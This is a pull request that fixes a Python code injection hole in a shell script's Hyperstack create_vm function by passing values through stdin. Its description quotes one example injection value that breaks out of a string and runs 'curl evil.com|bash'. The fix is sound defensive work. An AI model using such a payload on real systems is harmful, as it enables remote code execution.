### PR TITLE
fix: Prevent Python injection in Hyperstack create_vm

### DIFF
--- a/hyperstack/lib/common.sh
+++ b/hyperstack/lib/common.sh
@@ -156,16 +156,17 @@ create_vm() {
 
     log_warn "Creating Hyperstack VM '$name' (flavor: $flavor, env: $environment)..."
 
-    # Build request body
+    # Build request body using stdin to prevent Python injection
     local body
-    body=$(python3 -c "
-import json
+    body=$(printf '%s\n%s\n%s\n%s\n%s' "$name" "$environment" "$key_name" "$image" "$flavor" | python3 -c "
+import json, sys
+lines = sys.stdin.read().split('\n')
 body = {
-    'name': '$name',
-    'environment_name': '$environment',
-    'key_name': '$key_name',
-    'image_name': '$image',
-    'flavor_name': '$flavor',
+    'name': lines[0],
+    'environment_name': lines[1],
+    'key_name': lines[2],
+    'image_name': lines[3],
+    'flavor_name': lines[4],
     'count': 1,
     'assign_floating_ip': True,
     'security_rules': [


### PR DESCRIPTION
## Summary
- Fix Python code injection vulnerability in Hyperstack `create_vm()` where `$environment` (from `HYPERSTACK_ENVIRONMENT` env var or user prompt) and `$image` (from `HYPERSTACK_IMAGE` env var) were interpolated directly into Python single-quoted strings
- An attacker controlling these env vars could break out of the string with a single quote and execute arbitrary Python code (e.g., `HYPERSTACK_IMAGE="'; import os; os.system('curl evil.com|bash'); '"`)
- Fix passes all values via stdin to Python instead of shell interpolation, matching the pattern used to fix similar issues in Scaleway, UpCloud, and other providers

## Test plan
- [x] `bash -n` syntax check passes on all Hyperstack scripts
- [x] All 562 CLI tests pass (0 failures)
- [x] Verified `$name` and `$key_name`/`$flavor` are already validated (validate_server_name, validate_resource_name) but still passed via stdin for defense in depth